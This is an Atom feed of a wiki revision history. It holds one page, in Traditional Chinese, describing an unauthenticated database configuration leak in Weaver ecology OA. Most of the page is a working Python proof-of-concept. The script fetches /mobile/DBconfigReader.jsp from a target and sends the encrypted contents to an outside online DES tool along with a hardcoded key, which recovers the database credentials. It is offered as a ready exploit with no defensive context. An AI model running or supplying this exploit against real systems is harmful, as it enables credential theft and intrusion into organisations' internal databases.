<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2%2Fzh-hant</id>
	<title>泛微ecology OA數據庫配置信息洩露/zh-hant - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2%2Fzh-hant"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/zh-hant&amp;action=history"/>
	<updated>2026-04-11T01:01:00Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/zh-hant&amp;diff=6758&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;泛微ecology OA數據庫配置信息洩露&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/zh-hant&amp;diff=6758&amp;oldid=prev"/>
		<updated>2021-07-10T07:31:30Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;泛微ecology OA數據庫配置信息洩露&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;br /&gt;
==利用前提==&lt;br /&gt;
/mobile/DBconfigReader.jsp存在未授權訪問。&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import base64&lt;br /&gt;
import requests&lt;br /&gt;
import ast&lt;br /&gt;
 &lt;br /&gt;
def req(url):&lt;br /&gt;
    headers =  {&lt;br /&gt;
        'Content-Type':'application/x-www-form-urlencoded',&lt;br /&gt;
        'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',&lt;br /&gt;
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',&lt;br /&gt;
    }&lt;br /&gt;
 &lt;br /&gt;
    r1 = requests.get(url,headers=headers).content&lt;br /&gt;
    s = r1.replace('\r\n','')&lt;br /&gt;
    res1 = base64.b64encode(s)&lt;br /&gt;
     &lt;br /&gt;
    postdata = {&lt;br /&gt;
        'data':res1,&lt;br /&gt;
        'type':'des',&lt;br /&gt;
        'arg':'m=ecb_pad=zero_p=1z2x3c4v_o=0_s=gb2312_t=1'&lt;br /&gt;
    }&lt;br /&gt;
    u = 'http://tool.chacuo.net/cryptdes'&lt;br /&gt;
    r2 = requests.post(u,data=postdata,headers=headers).content&lt;br /&gt;
    res2 = ast.literal_eval(r2)&lt;br /&gt;
     &lt;br /&gt;
    return res2['data']&lt;br /&gt;
 &lt;br /&gt;
url = 'http://58.2xxx:8888//mobile/DBconfigReader.jsp'&lt;br /&gt;
print req(url)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>